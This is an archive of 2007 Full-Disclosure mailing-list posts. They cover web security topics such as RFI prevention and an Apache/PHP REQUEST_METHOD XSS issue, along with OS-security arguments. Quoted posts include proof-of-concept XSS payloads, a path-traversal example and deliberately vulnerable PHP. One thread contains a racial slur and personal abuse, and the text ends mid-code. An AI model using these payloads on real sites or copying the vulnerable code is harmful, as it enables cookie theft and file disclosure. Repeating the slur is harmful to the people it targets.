Re: [Full-disclosure] Am I missing anything ?

2007-07-24 Thread Kradorex Xeron
Simon and Joey,

Your comments are not contributing anything of value to the list and are 
causing the SNR of the list to go down.

I strongly suggest for you to both take your personal banter off-list. I 
suspect that the rest of the list does not want to hear your personal banter 
toward each other.

This is a security list, not a space for your personal bickering. Grow up.

On Monday 23 July 2007 18:48, Simon Smith wrote:
 Right kid... Can we also agree that you are immature? I mean, we can't lay
 this to rest unless we come to a compromise. Frankly, I don't feel that it
 would be a compromise if you didn't come half way in this relationship.

 While we're at it... Let's also agree that you're a coward, probably fat and
 lethargic... With no real friends... Who never really gets laid?

 Yeah I think that about sums it up... ;]

 On 7/23/07 6:40 PM, Joey Mengele [EMAIL PROTECTED] wrote:
  No, I forgot. I now remember, thank you. As long as we agree that
  you were wrong, I was right, and you are an ignorant jackass who
  may or may not have had sexual relations with the Oreo named KF, I
  see no need for this thread to continue.
 
  J
 
  On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith [EMAIL PROTECTED] wrote:
  You are right with respect to your RFI comment... But as far as me learning
  anything, don't count on it. I am after all an ignorant jackass remember?
 
  On 7/23/07 6:32 PM, Joey Mengele [EMAIL PROTECTED] wrote:
  But I am right, am I not? Just pointing out what everyone else was thinking
  already :)
 
  Anyway, if you are implying I am immature because of my ad hominem, please
  refer to the following:
 
  http://archives.neohapsis.com/archives/fulldisclosure/2007-01/0380.html
 
  You should have learned from KF by now the infosec mantra 'live by the
  niggerdong, die by the niggerdong'
 
  J
 
  On Mon, 23 Jul 2007 18:17:53 -0400 Simon Smith [EMAIL PROTECTED] wrote:
  Kid, your posts continue to clearly demonstrate your immaturity.
 
  http://www.security-express.com/archives/fulldisclosure/2007-07/0404.html
  http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0372.html
  http://seclists.org/fulldisclosure/2007/Jul/0369.html
  http://seclists.org/fulldisclosure/2007/Jul/0402.html
 
  It's too bad that you're such a coward man...
 
  On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED] wrote:
  Doesn't RFI stand for remote file inclusion you ignorant jackass?
 
  J
 
  On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith [EMAIL PROTECTED] wrote:
  Local and Remote file inclusion, yes, you are actually missing a bunch of
  things.. ;)
 
  On 7/23/07 1:20 PM, Deepan Chakravarthy [EMAIL PROTECTED] wrote:
  Hi All,
  Just wondered if I am missing anything important. Am planning to give a
  talk on web security.
  Is there any other technique other than the following I have to speak
  about?
 
  1) XSS
  2) CSRF
  3) SQL Injection
  4) AJAX/JSON hijacking
  5) HTTP response splitting
  6) RFI
  7) CRLF
  8) MITM
 
  Thanks
  Deepan
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Office 0day

2007-06-25 Thread Kradorex Xeron
On Sunday 24 June 2007 16:19, [EMAIL PROTECTED] wrote:
 I can't give detail here

Isn't this list called full-disclosure? In other words: If you aren't 
going to disclose anything, DON'T post that you have something. This list 
is designed specifically for disclosing (and discussing on occasion) 
vulnerabilities, problems, etc. to the entire community at once, not just 
selectively to whom you choose (i.e. who buys your 0day).



Re: [Full-disclosure] n3td3v says second internet exists

2007-06-16 Thread Kradorex Xeron
Okay, I have a few points I would like to make (assuming this is true, 
which I doubt, as it is technologically possible to properly implement):

1. The Internet is not owned or run by a single government, therefore this is 
impossible to implement successfully and properly. The Internet as we know it 
cannot be controlled by a single government. The Internet as we know it is a 
de-centralized entity, with no central network that controls it all.

2. This current Internet (aka the former ARPAnet) has something we like to 
call redundancy, and since the Internet (ARPAnet) is de-centralized, there 
is no real method of attacking the Internet; you can only attack nodes of 
the Internet, as when you take down one link, another comes up to service, take 
down that link, and yet another comes about. The Internet is more complex 
than having a bunch of home routers linked with single links peered between 
each other.

3. Switching people over and With new protocols - hm.. What could go wrong 
here... people's computers failing to being able to communicate with 
this new Internet because of incompatible protocols as well as operating 
systems... as well as what would be done to prevent 'crap' from the old 
internet from leaking over? 

I suggest you stop donning a tin foil hat every time people think of a plan, 
especially those without a clue (i.e. corporate execs and government).

My apologies to the list for increasing the noise end of the SNR of the list.

On Saturday 16 June 2007 16:18, HACK THE GOV wrote:
 
  secret information regarding second internet  Reader post by: n3td3v
 Posted on: June 15, 2007, 6:14 AM PDT
 Story: Coming attractions for history's first cyber-war
 http://news.com.com/2010-7349-6191184.html?tag=tb

 the government are building a second internet in case this one goes down.

 not only is the second internet being built in case the first one gets
 attacked, in fact the government plan to eventually switch everyone over to
 the second internet because it's being built with security in mind.

 the problem with the first internet is, it's not very secure and from the
 government's point of view not very well designed for counter-terrorism
 eavesdropping.

 new protocols and processes are being developed on the new internet which
 will be exclusively used by the u.s government until the roll out in 20 to
 30 years time, although the u.s government will cut that public release
 timeline if a major breakdown of the internet occurs through cyberattacks.

 in high level meetings with corporate america officials, technical details
 of how to let corporate security experts switch over to the highly
 classified second internet project in time of national emergency was
 disclosed.

 all parties involved in talks have signed documents to stop them talking
 about it in public, although details of the second internet have been
 obtained by international hackers, who have become familiar with the
 project.

 documents containing the plans for the second internet were downloaded off
 government computer networks by underground hackers, and therefore the
 information regarding the second internet project have been leaked.

 it is unclear how far on in development the project is, due to the papers
 obtained by illegal authorised entry into u.s government networks was not
 marked as the same time period as when the papers of the plans were
 obtained by the illegal means of international hackers.

 in private the government are trying not to talk about cyber attacks too
 much so not to over talk the risk to national government and e-commerce
 interests, but in truth they are only too aware of the threat to their own
 communications and anti missile systems, therefore a second highly
 classified internet was advised by top level whitehouse advisors who have
 consulted with cyber security experts in classified meetings with
 government officials.

 the safety net known as the second internet may save america from certain
 national economic disaster and attacks to u.s army defense systems in a
 time of real world war when nuclear and cyber attacks are likely to happen.

 link:
 http://news.com.com/5208-7349_3-0.html?forumID=1&threadID=28254&messageID=278411&start=-1



Re: [Full-disclosure] You shady bastards.

2007-06-08 Thread Kradorex Xeron
On Friday 08 June 2007 07:12, Thierry Zoller wrote:
 Dear List,

 I know we have a World Police but luckily we have no World laws, how
 about some of you stick to things you're supposed to be able to do,
 security, coding whatever and leave law to those that practise it?

 I have yet to see a lawyer good at sec, it depends on
 - legislation the company resides in
 - the contract
 - the form of the message

 In Luxembourg for instance mails labeled as PRIVATE or CONFIDENTIAL
 are not allowed to be viewed by the company, ALSO as email. Write it
 in the subject line.

To risk breaking my keeping off legal grounds (note: IANAL)

With your logic, someone could bring in their home computer, hook it into the 
network, upload their private files to the server and name a 
directory CONFIDENTIAL and shove their personal home files in it and nobody 
is allowed to see what's in it to determine if it's supposed to be there or 
not because it's named CONFIDENTIAL, thus the person gets free space on the 
COMPANY server to do whatever they please, even after they leave the company.

To be brutally honest, those marked CONFIDENTIAL emails stick about as much 
as those lines some corporations make their staff have at the bottom of 
emails that say essentially "If you received this email in error, delete it 
immediately as it is confidential. It is illegal for you to have this email 
if it isn't regarding you."

Is it me or are too many people expecting security by good will nowadays?



Re: [Full-disclosure] You shady bastards.

2007-06-08 Thread Kradorex Xeron
On Friday 08 June 2007 08:04, Thierry Zoller wrote:
 Dear Kradorex,
 Oh now Canada enters the game, somebody from Russia please also comment
 on Luxemburgish law, awesome.

 It is not logic, it's law (read: positive law). It applies to Mail
 only, get over it. It gives you legal ground to sue. Can you grasp
 the concept here?

Okay, if you want to go about it that way and use the law in this game:

In that event: It should therefore be the user's responsibility alone, nobody 
else's, regardless of departure reason (fired, quit, etc.) to tell the people 
that the specified mailbox will be terminated. Furthermore, mail should be 
dropped upon the employee's departure, regardless of whether the user made those 
statements to those who he/she communicates with, as there would be nobody 
else that has legal qualification to touch mail sent to that box; therefore, for 
anyone not contacted who continues to send mail to the defunct address, too 
bad. They may get notified later on, they may not; just continue dropping the 
mail.

As long as the caretaking of defunct mailboxes is under someone else's 
control, there will be snooping going on.

So best option: Terminate account, delete all mail in the box and being 
received for then on, have nobody take care of any defunct mailboxes. That 
way, nobody could be exposed to privacy invasion lawsuits.

End of Problem.



Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread Kradorex Xeron
On Wednesday 06 June 2007 09:47, H D Moore wrote:
 Hello,

 Some friends and I were putting together a contact list for the folks
 attending the Defcon conference this year in Las Vegas. My friend sent
 out an email, with a large CC list, asking people to respond if they
 planned on attending. The email was addressed to quite a few people, with
 one of them being David Maynor. Unfortunately, his old SecureWorks
 address was used, not his current address with ErrattaSec.

 Since one of the messages sent to the group contained a URL to our phone
 numbers and names, I got paranoid and decided to determine whether
 SecureWorks was still reading email addressed to David Maynor. I sent an
 email to David's old SecureWorks address, with a subject line promising
 0-day, and a link to a non-public URL on the metasploit.com web server
 (via SSL). Twelve hours later, someone from a Comcast cable modem in
 Atlanta tried to access the link, and this someone was (confirmed) not
 David. SecureWorks is based in Atlanta. All times are CDT.

 I sent the following message last night at 7:02pm.

 ---
 From: H D Moore hdm[at]metasploit.com
 To: David Maynor dmaynor[at]secureworks.com
 Subject: Zero-day I promised
 Date: Tue, 5 Jun 2007 19:02:11 -0500
 User-Agent: KMail/1.9.3
 MIME-Version: 1.0
 Content-Type: text/plain;
   charset=us-ascii
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 Message-Id: 200706051902.11544.hdm[at]metasploit.com
 Status: RO
 X-Status: RSC

 https://metasploit.com/maynor.tar.gz
 ---

 Approximately 12 hours later, the following request shows up in my Apache
 log file. It looks like someone at SecureWorks is reading email addressed
 to David and tried to access the link I sent:

 71.59.27.152 - - [05/Jun/2007:19:16:42 -0500] GET /maynor.tar.gz
 HTTP/1.1 404 211 - Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
 AppleWebKit/419 (KHTML, like Gecko) Safari/419.3

 This address resolves to:
 c-71-59-27-152.hsd1.ga.comcast.net

 The whois information is just the standard Comcast block boilerplate.

 ---

 Is this illegal? I could see reading email addressed to him being within
 the bounds of the law, but it seems like trying to download the 0day
 link crosses the line.

 Illegal or not, this is still pretty damned shady.

 Bastards.

 -HD

I will seldom touch on the legal side but I have a possible scenario:

-- If David is no longer at that address, it could be said that his mail 
account was taken down and the mail sent ended up in a possible catch-all 
box; perhaps someone at SecureWorks was looking through the said catch-all 
mailbox for any interesting mail sent to the secureworks.com domain (i.e. to 
old employees). It's quite common for companies and organizations to monitor 
former employee mailboxes so that anyone who doesn't have any new 
contact information is still able to get somewhere with the old address. 
And them being a security organization, maybe they proceeded to investigate 
the link sent.





Re: [Full-disclosure] Hashes

2007-05-29 Thread Kradorex Xeron
To what? Your dog? The universe? an MP3 you downloaded? a program?

:P

On Tuesday 29 May 2007 03:17, I)ruid wrote:
 MD5:1db6eff5a4961bba5779349a4932606d
 SHA1:   80dbb7a782da0d2c09dc4d67750575c08b61e9ac
 SHA256: da62ba72af7b3a4d886ab61cea6d2177139be67ff564826ab3fd6e09b56ebe06



Re: [Full-disclosure] How to protect RFI ??

2007-05-26 Thread Kradorex Xeron
On Saturday 26 May 2007 16:37, Mark Sec wrote:
 does anyone know how to protect against RFI (Remote file inclusion), and what i need
 to see over php files ?

 -mark

On a script basis:
1. Parse input for validity
2. Don't allow urls to be unconditionally accepted
3. Don't allow XSS by making sure input is genuine and doesn't contain extra 
characters beyond what is expected.

On a server-basis:
If it is a server that will be hosting users, I suggest deactivating RFI 
altogether, as users may install scripts that don't check input. 
Furthermore, disable sockets to prevent users from starting up their 
own services and/or backdoors; even though there may not be privileged 
access, if a user gets a shell of some sort, they may be able to get your 
system roped into a botnet or filestore under the HTTPD's account.

However, if it will only be hosting you, then it may be acceptable to leave 
the default config and make sure scripts behave on a per-script basis as RFI 
may be eventually useful for you if you parse the include input.

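The script-side and server-side advice above, as an added example that is not code from the thread: a page-loader in the shape RFI reports are usually about, in its vulnerable form and in an allowlisted form, with the php.ini directives that correspond to "deactivate RFI altogether" and "disable sockets". The parameter name (`page`), the `pages/` directory and the `disable_functions` list are illustrative assumptions.

```php
<?php
// Added example, not code from the original thread. The parameter name
// ($_GET['page']) and the pages/ directory are illustrative assumptions.

// --- Vulnerable form: the user's string goes straight into include() ------
// With allow_url_include=On a URL in ?page= fetches and executes remote
// code; even with it Off, this line still permits local file inclusion via
// ../ traversal, so the php.ini setting alone does not fix the script.
function load_page_vulnerable(): void
{
    include $_GET['page'] . '.php';
}

// --- Hardened form: an allowlist decides, never the user's string ---------
/** Pages this site actually has; the keys are the only accepted input. */
function allowed_pages(): array
{
    return [
        'home'    => __DIR__ . '/pages/home.php',
        'about'   => __DIR__ . '/pages/about.php',
        'contact' => __DIR__ . '/pages/contact.php',
    ];
}

/** Step 1 of the post (parse input for validity): exact key match or nothing. */
function resolve_page(?string $requested): ?string
{
    $pages = allowed_pages();
    if ($requested === null || !array_key_exists($requested, $pages)) {
        return null; // URLs, slashes, NUL bytes and unknown names all end here
    }
    return $pages[$requested];
}

function load_page_hardened(): void
{
    $path = resolve_page($_GET['page'] ?? 'home');
    if ($path === null) {
        http_response_code(404);
        // Step 3 of the post: reflect nothing the client sent, so a bad
        // page name cannot double as a reflected XSS payload.
        echo 'Unknown page';
        return;
    }
    include $path;
}

// --- Server side (php.ini), for a host serving other people's scripts -----
// One mapping of the post's "deactivate RFI altogether" and "disable
// sockets" (the function list is an assumption, not the post's):
//   allow_url_include = Off
//   allow_url_fopen   = Off
//   disable_functions = fsockopen, pfsockopen, socket_create, stream_socket_server
```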


Re: [Full-disclosure] WordPress Community Vulnerable

2007-05-24 Thread Kradorex Xeron
On Thursday 24 May 2007 12:57, Paul Schmehl wrote:
 --On Thursday, May 24, 2007 09:44:02 -0500 Steven Adair

 [EMAIL PROTECTED] wrote:
  So do you think his two WordPress blogs (I am assuming here..looks a lot
  like WP, but I'm not pounding out GET requests to verify) were included
  in this survey that was done?  I wonder if he's running a safe version?
  And as mentioned in one of his blog comments, version reporting isn't
  always reliable and patches that did not change the extractable version
  number could have also been applied.
 
  In any event, I think WordPress has increasingly become more secure. 
  It's had a small rash of issues a few months back ranging from SQL
  injection to someone actually backdooring the source, but it's grown up
  quite a bit.  I think someone would be hard pressed to actually come up
  with the Month of Wordpress bugs.  The majority of all other recently
  reported issues have all been from third-party add-ons that aren't actually a
  part of WordPress.

 Yes, but the point of his post isn't that *Wordpress* is insecure.  It's
 that blog owners are not updating their software to maintain security.
 While anyone in IT would go doh!, many in the real world might be
 surprised that the software has to be regularly updated and vigorously
 maintained to ensure ongoing security.

Probably because a lot of the said blog owners that neglect upgrading are like 
any regular computer user: they just want something to work, and if it works, 
they assume it's okay. Therefore, they ignore security upgrades, since it 
would require additional work for something that is not visible to them, as 
they go by the premise: if it has no new features, why upgrade?

We all know (at least I hope) that security upgrades are something worthwhile 
because we can see the difference (we can test the exploit on the new version 
to see if it's patched or not), whereas a regular user would not.


 This isn't exactly news for us, but it may well be for the blogosphere in
 general.



Re: [Full-disclosure] Linux big bang theory....

2007-05-15 Thread Kradorex Xeron
On Monday 14 May 2007 01:46, Just1n T1mberlake wrote:
  scott wrote:
   Evidently you need more experience in security research:
   http://projects.info-pull.com/moab/
  
   I believe this should dispel your myth about OSX's invulnerability.
   Really...did you honestly believe it was invincible?
  
   Regards

 Of course no operating system is invincible when you have full access
 to the machine. You could just delete all of the files yourself.
 OSX isn't using all of the tricks like windows does to try and hide
 executables throughout dlls and other such files. Ever heard of dll
 hell? No wonder these machines are broken into so often.
 The point is what would you rather have 1000 windows machines 1000
 linux machines or 1000 OSX machines? If you wanted to not be infected
 I'd be taking the OSX machines for sure, otherwise if you want to get
 these kind of kernel rootkit tricks of JOquendo or something like
 rhosts for your life then you would choose one of the linux
 distributions.
 What next are you going to virtualise this and run them all on the
 same host? Frankly, it really doesn't matter what your guest server is
 running if your host is broken :-)

Your points are moot.

The only reason OSX is so good security-wise is because the OS doesn't give 
open administrator access to the users, preventing the dumbness of the 
unintelligent users from screwing up the OS in the conventional sense. I bet 
the instant you introduce administrative privs into OSX, you'd get security 
breaches galore. 

To put it bluntly: OSX treats its users like they're in a playpen, trying not 
to expose the users to the real world.

It's the DUMB USERS who are the security risks. NOT the OS the majority of the 
time. If you left a Windows machine running, with a competent user, it will 
have a lower risk of becoming infected/rooted  than if you parked a clueless 
user in front of the machine.

Same with Linux: park a stupid superuser in front of the machine and you will of 
course get stupid results. However, if you get a competent superuser 
that only uses root for admin tasks and doesn't do anything 
experimental under root on a production machine, as well as not giving users 
any more permission than they need, you'd be set.

So what are we trying to do? protect the OS from what? or protect the users 
from making idiotic decisions that will screw up their boxes?

Remember folks: Computers only operate as well as those who operate them.


 --
 Winning is a habit. Unfortunately, so is losing. - Vincent Lombardi



Re: [Full-disclosure] Linux big bang theory....

2007-05-14 Thread Kradorex Xeron
On Monday 14 May 2007 01:46, Just1n T1mberlake wrote:
  scott wrote:
   Evidently you need more experience in security research:
   http://projects.info-pull.com/moab/
  
   I believe this should dispel your myth about OSX's invulnerability.
   Really...did you honestly believe it was invincible?
  
   Regards

 Of course no operating system is invincible when you have full access
 to the machine. You could just delete all of the files yourself.
 OSX isn't using all of the tricks like windows does to try and hide
 executables throughout dlls and other such files. Ever heard of dll
 hell? No wonder these machines are broken into so often.
 The point is what would you rather have 1000 windows machines 1000
 linux machines or 1000 OSX machines? If you wanted to not be infected
 I'd be taking the OSX machines for sure, otherwise if you want to get
 these kind of kernel rootkit tricks of JOquendo or something like
 rhosts for your life then you would choose one of the linux
 distributions.
 What next are you going to virtualise this and run them all on the
 same host? Frankly, it really doesn't matter what your guest server is
 running if your host is broken :-)


Your points are moot.

The only reason OSX is so good security-wise is because the OS doesn't give 
open administrator access to the users, preventing the dumbness of the 
unintelligent users from screwing up the OS in the conventional sense. I bet 
the instant you introduce administrative privs into OSX, you'd get security 
breaches galore. 

To put it bluntly: OSX treats its users like they're in a playpen, trying not 
to expose the users to the real world.

It's the DUMB USERS who are the security risks. NOT the OS the majority of the 
time. If you left a Windows machine running, with a competent user, it will 
have a lower risk of becoming infected/rooted  than if you parked a clueless 
user in front of the machine.

Same with Linux: park a stupid superuser in front of the machine and you will of 
course get stupid results. However, if you get a competent superuser 
that only uses root for admin tasks and doesn't do anything 
experimental under root on a production machine, as well as not giving users 
any more permission than they need, you'd be set.

So what are we trying to do? protect the OS from what? or protect the users 
from making idiotic decisions that will screw up their boxes?

Remember folks: Computers only operate as well as those who operate them.

 --
 Winning is a habit. Unfortunately, so is losing. - Vincent Lombardi



Re: [Full-disclosure] Linux big bang theory....

2007-05-11 Thread Kradorex Xeron
On Thursday 10 May 2007 19:43, KJKHyperion wrote:
 J. Oquendo wrote:
  KJKHyperion wrote:
  why, Windows machines of course, I'm an attacker, not a fool! If you
  were a terrorist, what would you rather do?
 
  Crash the Twin Towers
  Crash the dollar
 
  There is no such thing as an attacker. All actions, even such an
  individual's, are driven by economical considerations.
 
  With this said, if I were an attacker with economics in mind
  why would I want to target a machine which has X amount of
  vendors sifting through the much of malware and viruses when
  I could spawn off an semi undetectable program and KEEP IT
  THERE without having to wait for the next best thing.

 So many misconceptions, so little time.

 First of all, I meant economical in not just a monetary sense, but the
 wider sense of balancing conflict in everyone's interest. And well, I
 got the impression you were thinking of outlandish lose-lose (hence
 anti-economical) scenarios where some loose cannon shuts down the whole
 internet, but on second thought I might have been wrong on that account.
 The idea was that, as effective an enemy-killer crashing the dollar
 would be, it would prove counterproductive, damaging irreparably the
 very currency that puts bread on your table and AK-47 on your shoulder.
 So a purely economical evaluation will bring you to choose, instead, the
 option causing the lesser evil (i.e. the virtual death of the airline
 terrorism market).

 Second, don't kid yourself, the market of security suites for Windows
 is, at best, an open-air fish marketplace (a terrible stink, a lot of
 yelling and products with an inherently short freshness timespan the
 first similarities that come to mind, but I'm sure the mental picture
 will evoke you many others).

 I have written Windows attack software for a living, and there's one
 thing I can write down and undersign in my own blood: Windows cannot be
 secured. Which is very bad news for the whole industry, Windows being
 the system with the highest security/feature richness ratio, or in other
 words the culmination of the state of the art of software engineering as
 we know it. We lack the semantic tools to even express *what* Windows
 does, much less how, much less to tell right from wrong

 [The feeble-minded, confronted with this, retreat in the virtualization
 hugbox, forgetting the historic lesson that the Titanic sank because the
 flooding bypassed the (insufficiently fine-grained, at that) waterproof
 compartments by reaching *over* them -- and let's leave it at that,
 before runaway metaphorization makes me say something about how Leonardo
 Di Caprio fits that I will regret]

 There is nothing, absolutely nothing you can do to isolate applications,
 or tell malicious from normal behavior. Hell, you can hardly tell apart
 applications from each other. An application is often just an EXE, but
 sometimes it's an EXE and a bunch of DLLs, and sometimes one of the DLLs
 is loaded in all active processes, and sometimes the EXEs are two or
 more, and sometimes a driver is thrown in the mix, and yet sometimes all
 you have is a single DLL, a DLL that, sometimes, must *necessarily* be
 loaded at random times in an arbitrary process (see: IMEs).

 Not that it matters at all, since the biggest names in security suites
 fail even the most basic, trivial tests (god is my witness in how often
 I overengineered some protection routine, only to discover that
 expensive security suites that shall go unnamed didn't notice the whole
 trojan in the first place), but it's kind of comforting to know that the
 problem is unsolvable in principle, now isn't it?

 So stop shelling out money to the snake oil salesmen or even giving them
 any credit. When humanity's flagship software product is in such a sorry
 state, you know there is nothing a random moron like you can do. Let the
 scientists discover the obvious, let the engineers put it in practice,
 and until then, for the love of god and all that is holy, _just_ _don't_
 _swallow_.

 [Microsoft being Microsoft, the most important software engineering
 proof-of-concept, ever, they have developed will probably become a
 product in ten years from now, if ever, be a huge flop at it and be
 forgotten soon. It's called Singularity, it's an operating system
 99.999% based on .NET, it will make your CPU simpler and faster and your
 software safer, it's sort of like what Inferno would be if it was
 actually meant to be used by human beings, *and* if your irrational
 racist hate of .NET or other kind of short-sightedness makes it seem any
 less than the... singularity that will take the world by storm and
 change it forever I see it as, *then* to me you are dead from the
 inside; http://research.microsoft.com/os/singularity/ for more
 information]

  And if you think for a second that Boohoo Linux users are more inclined
  to be security conscious then you are the fool here.

 Haha, yes they are, according to their self-assessment. As for 

Re: [Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability

2007-04-25 Thread Kradorex Xeron
On Wednesday 25 April 2007 05:35, Vincent Archer wrote:
 On Tue, 2007-04-24 at 20:03 +0300, عبد الله احمد عنان wrote:
  This is a case of poor programming, on the script coder's part, it is
  not so
  much a vulnerability.

 In that case, nobody's talking about vulnerabilities on this list, only
 poor programming. :)

Vulnerabilities are results of poor programming.


 The problem in here is that the programmer assumes that the variables
 do have a proper value checking done prior to handing off to the script
 engine. HTTP_METHOD is well defined. One would assume apache has
 validated the method somehow.


If you properly code the scripts, Apache's acceptance of misc data in the 
method field is not a vulnerability, it is a feature that could be used to 
make that field extensible with minimal effort. i.e. a script could be 
designed to send out data based on different methods not listed in the RFC.

 Unfortunately, this assumption was flawed.

  That variable only contains what it is sent by apache. it doesn't
  parse it.
  nor is it supposed to.

 However, it (apache) should perform integrity checks, because it has the
 capacity to do so.


True, but Apache should not facilitate lazy programming on script programmers' 
part. The more you babysit people, the more they will rely on that 
babysitting and not do it for themselves, because they will inherently assume 
that they have a 'safety net'; thus if the script is run on a server without 
that safety net, THAT server gets labeled as vulnerable when, without that 
script, the server is not vulnerable.

What are we going to do next? Get the HTTPD to validate the URL-based queries 
(i.e. script.php?var=value) to prevent unintended input 
(i.e. viewfile.php?file=../../../file)? This is a SCRIPT problem, not a 
problem with the HTTPD. 

  This CAN be a vulnerability with individual scripts, however, it is
  not a vuln
  with PHP or Apache.

 Not with PHP. But I would agree with the original programmer that apache
 is in fault here. Apache should have done the expected work, and
 validated that the request was standards-compliant. It didn't, and that
 opens up a huge chasm in which plenty of problems, vulnerabilities and
 others, may hide.

From RFC 2616 Section 5.1.1:
The list of methods allowed by a resource can be specified in an Allow header 
field (section 14.7). The return code of the response always notifies the 
client whether a method is currently allowed on a resource, since the set of 
allowed methods can change dynamically. 


The standards don't say anything about a static list of methods being 
required, so Apache is compliant there. It is a per-script problem of not 
parsing the raw data provided to the script properly.

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] OpenSSH - System Account Enumeration if S/Key is used

2007-04-25 Thread Kradorex Xeron
On Wednesday 25 April 2007 15:49, Knud Erik Højgaard wrote:
  But opie not that cool nonetheless, for example there is an
  off-by-one in accessfile.c

 lol stop disclosing 0day

Wouldn't that defeat the purpose of this list?




Re: [Full-disclosure] Apache Illegal Request Handling Possible XSS Vulnerability

2007-04-24 Thread Kradorex Xeron
That would severely cut most extensibility and require further implementations 
to be hardcoded, thus limiting apache's modular nature.

The original RFC would be insufficient for its list, as there are modules such 
as webdav (as in the previous example) that add to that list of methods.

Apache isn't just your basic run-of-the-mill GET/POST HTTPD; it is highly 
extensible. Sure, if it WAS a basic one, I could see limiting that list, but 
it's quite advanced and modular in design.

On Tuesday 24 April 2007 05:18, Michal Majchrowicz wrote:
 Hi.
 I think that server should have a list of valid requests. In fact
 Apache warns you sometimes that valid requests are:
 GET/POST/TRACE/OPTIONS. The solution that it just accepts everything
 as request and protocol makes no sense. What kind of protocol is
 script?
 Regards Michal.

 On 4/24/07, Richard Moore [EMAIL PROTECTED] wrote:
  Michal Majchrowicz wrote:
   Hi.
   I think now we can classify this as flaw in Apache. It accepts
   requests that simply make no sense. Take a look at this example:
   <script>alert(document.cookie);</script> /test.php
   <script>alert(document.cookie);</script>
   In some circumstances it may cause XSS vulnerability:
   <?php
   echo $_SERVER['REQUEST_METHOD'];
   echo $_SERVER['SERVER_PROTOCOL'];
   ?>
 
  As Kradorex Xeron said, that's a flaw in the script. Apache needs
  to let arbitrary verbs through to the PHP (or other server extension)
  otherwise tools like webdav that require additional verbs could not
  be implemented. It is possibly arguable that it should restrict the
  verbs to a single alphanumeric string, but it certainly can't be
  counted on to be just GET/POST etc.
 
  Cheers
 
  Rich.
 
   I am now investigating other possible attacks.
   Regards Michal Majchrowicz.
  
 
  --
  Richard Moore, Principal Software Engineer,
  Westpoint Ltd,
  Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England
  Tel: +44 161 237 1028
  Fax: +44 161 237 1031



Re: [Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability

2007-04-24 Thread Kradorex Xeron
This isn't only a problem with that specific variable, it is also a problem 
with any user-defined variable, i.e.

<?
echo $_GET['page'];
?>
can be XSS'd with script.php?page=<b>blah</b>

However:

<?
echo htmlentities($_GET['page']);
?>
is much harder to exploit to inject malicious code.

I believe the following: If your program/script accepts any user input, never 
assume something else will block the exploit of your program; always 
implement sanity checks, and/or strip nonsense out of the input.

On Monday 23 April 2007 18:21, Michał Majchrowicz wrote:
 I agree. But (as a programmer) would you assume that there can be such
 things in the REQUEST_METHOD? The flaw is that Apache accepts anything
 after the valid request i.e. GET. There should be an error that the
 request was not correct.
 Regards Michal.

 On 4/24/07, Kradorex Xeron [EMAIL PROTECTED] wrote:
  This is a case of poor programming on the script coder's part; it is not
  so much a vulnerability.
 
  That variable only contains what it is sent by Apache. It doesn't parse
  it, nor is it supposed to. If you want to ensure there is no XSS going
  on, parse the variable, escape characters, etc., as it IS user input.
 
  This CAN be a vulnerability with individual scripts, however, it is not a
  vuln with PHP or Apache.
 
  On Monday 23 April 2007 17:31, Michal Majchrowicz wrote:
   There exists a flaw in the way the Apache and PHP combination handles the
   $_SERVER array.
   If the programmer writes a script like this:
   <?php
     echo $_SERVER['REQUEST_METHOD'];
   ?>
   He will assume that REQUEST_METHOD can only be: GET,POST,OPTIONS,TRACE
   and all that stuff. However this is not true, since Apache accepts
   requests that look like this:
   GET<script>alert(document.coookie);</script> /test.php HTTP/1.0
   And the output for this would be:
   GET<script>alert(document.coookie);</script>
   Of course it is hard to exploit (I think some Flash might help ;)) and
   I don't know if it is exploitable at all. But programmers should be
   warned about this behaviour. You can't trust any variable in the
   $_SERVER table!
   Regards Michal Majchrowicz.
  
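
The two fixes this thread converges on, as an added example that is not code from any of the posts: the allow-list check on REQUEST_METHOD that a script must do for itself (the point of the 2007-04-25 reply above about RFC 2616 5.1.1), plus HTML-escaping on output for the $_GET['page'] case. The helper names is_http_token, normalize_method and h are my own, and the request values are constructed inline so it runs from the PHP CLI without Apache.

```php
<?php
// Added example, not code from the thread. Demonstrates treating every
// $_SERVER / $_GET value as user input: (1) validate the method against an
// allow-list the script owns, (2) HTML-escape everything on output.

// RFC 2616 "token" grammar: one or more CHARs that are neither CTLs nor
// separators. This is the loosest shape a method can have; Apache hands the
// raw method through, so even a syntactically valid token is still untrusted.
function is_http_token(string $s): bool
{
    return preg_match('/^[!#$%&\'*+\-.^_`|~0-9A-Za-z]+$/D', $s) === 1;
}

// The methods THIS script handles. Per RFC 2616 5.1.1 (quoted in the thread)
// the resource decides what is allowed, which is why the allow-list belongs
// in the script and not in the HTTPD.
const ALLOWED_METHODS = ['GET', 'POST', 'HEAD'];

// Returns the method if it is one we handle, null otherwise. Methods are
// case-sensitive, so no uppercasing: "get" is not "GET".
function normalize_method(string $raw): ?string
{
    return in_array($raw, ALLOWED_METHODS, true) ? $raw : null;
}

// Escape for an HTML text/attribute context. Every request-derived string
// goes through this before it is echoed.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// The pattern from the thread: raw echo of REQUEST_METHOD and $_GET['page'].
// Kept only so the difference in output is visible.
function render_vulnerable(array $server, array $get): string
{
    return '<p>' . ($server['REQUEST_METHOD'] ?? '') . ' ' . ($get['page'] ?? '') . '</p>';
}

// Hardened version: unknown methods get 405 + Allow, known ones are escaped.
function render_hardened(array $server, array $get): string
{
    $method = normalize_method((string)($server['REQUEST_METHOD'] ?? ''));
    if ($method === null) {
        if (PHP_SAPI !== 'cli') {           // headers only make sense under a web SAPI
            http_response_code(405);
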